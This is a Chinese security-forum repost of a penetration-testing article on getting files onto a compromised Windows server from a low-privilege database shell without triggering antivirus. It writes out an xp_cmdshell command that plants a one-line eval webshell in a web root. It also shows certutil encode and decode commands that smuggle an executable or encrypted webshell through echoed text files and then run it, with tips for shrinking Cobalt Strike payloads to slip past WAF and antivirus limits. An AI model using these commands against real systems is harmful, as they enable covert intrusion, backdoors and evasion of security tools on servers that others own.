安全矩阵

 找回密码
 立即注册
搜索
查看: 2356|回复: 0

文件上传的一个骚操作(低权限+bypassAV)

[复制链接]

251

主题

270

帖子

1783

积分

金牌会员

Rank: 6Rank: 6

积分
1783
发表于 2022-5-20 10:45:26 | 显示全部楼层 |阅读模式
本帖最后由 Meng0f 于 2022-5-20 10:47 编辑

文件上传的一个骚操作(低权限+bypassAV)收录于合集
#渗透技巧 12 个
#防护绕过 51 个
                        声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。
                        


文章来源:FreeBuf(耳旁的歌)
原文地址:
文件上传的一个骚操作(低权限+bypassAV) - FreeBuf网络安全行业门户

0x01 前言
各位在渗透中是否遇见过这个问题:

虽然有低权限命令shell,如mssql、postgres等,执行下载总是各种无权限或者被AV杀,轻则无法继续渗透,重则弹出拦截消息,管理员上机后立马发现。

本文将介绍一种使用windows自带工具进行编码,写入编码数据到TXT文本最后再解码的骚操作。

0x02 正文
话不多说,例如这样场景:在数据库连接后或者sqlmap注入连接os-shell后可执行命令。

​编辑

其中包括杀软或某狗、某盾
​编辑

此时下载文件的各种命令均被拦截
bitsadmin:
​编辑

certutil证书:
​编辑

还会被杀软报警
​编辑

powershell也会被彻底封杀
​编辑

尤其是某管家,拦截更彻底,根本没有倒计时自动消失(此时需要夸一下某大厂的报警提示倒计时功能)
​编辑

而在这种环境下可在有权限写入的前提下尝试写入一句话木马


xp_cmdshell 'echo  ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["bmfx"], "unsafe");%^>> D:\\WWW\\bmfx.aspx'

但也存在被某狗、WAF杀掉的可能,此时,骚操作上场

windows自带的证书下载,也就是上文使用但远程下载被拦截的Certutil,还可用来对文件编码解码


本地:Certutil -encode artifact.exe artifact.txt
或指定路径:Certutil -encode d:\artifact.exe d:\artifact.txt
​编辑

将txt文本使用echo命令


echo sfAFASFAsfasgasdf………>>d:\1.txt

写入服务器后,进入txt所在目录执行解码(或直接指定物理目录文件)


Certutil -decode art.txt art.exe或:Certutil -decode d:\art.txt d:\art.exe
​编辑

后续可在命令中执行exe上线


cmd.exe /c art.exe

重点是:本地解码编码操作不会触发杀软拦截行为!

此外,Certutil支持将任意文件编码解码,除了exe还有aspx、php、jsp等(如加密免杀的webshell,此处使用哥斯拉为例)
​编辑

可在web站点写入文件后访问txt查看写入有无偏差
​编辑

还有一点,本人亲测,编码后txt中的文本类似于生成的shellcode,会自动换行显示,但本地替换换行符、自行拆分换行符,不改变内容的前提下,编码、解码前后的文件不会有任何影响。

但是在navicat等数据库软件里操作的话还有一个限制,echo的长度会提示不要过长
​编辑

此时就要看各位师傅们在bypass WaF、AV时如何减小体量了,一般cs的马bypass后会在50k左右,使用sqlmap的—os-shell执行echo不会像navicat要求128字符那么短,但也有长度限制,具体各位可亲测。

关 注 有 礼


关注公众号回复“9527”可以领取一套HTB靶场文档和视频,“1208”个人常用高效爆破字典,“0221”2020年酒仙桥文章打包,“2191”潇湘信安文章打包,“1212”杀软对比源码+数据源,“0421”Windows提权工具包。
​编辑
还在等什么?赶紧点击下方名片关注学习吧!
​编辑

推 荐 阅 读

正在上传…重新上传取消
正在上传…重新上传取消
正在上传…重新上传取消

欢 迎 私 下 骚 扰

​编辑
预览时标签不可点
收录于合集 #

上一篇 下一篇
​编辑
微信扫一扫
关注该公众号
[url=]知道了[/url]
​编辑
微信扫一扫
使用小程序
[url=]取消[/url] [url=]允许[/url]
[url=]取消[/url] [url=]允许[/url]
: , 。   视频 小程序 赞 ,轻点两下取消赞 在看 ,轻点两下取消在看 <From:https://mp.weixin.qq.com/s/bGrPD7-sxDwhWQxATf6gAA>
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-3-29 17:57 , Processed in 0.021507 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表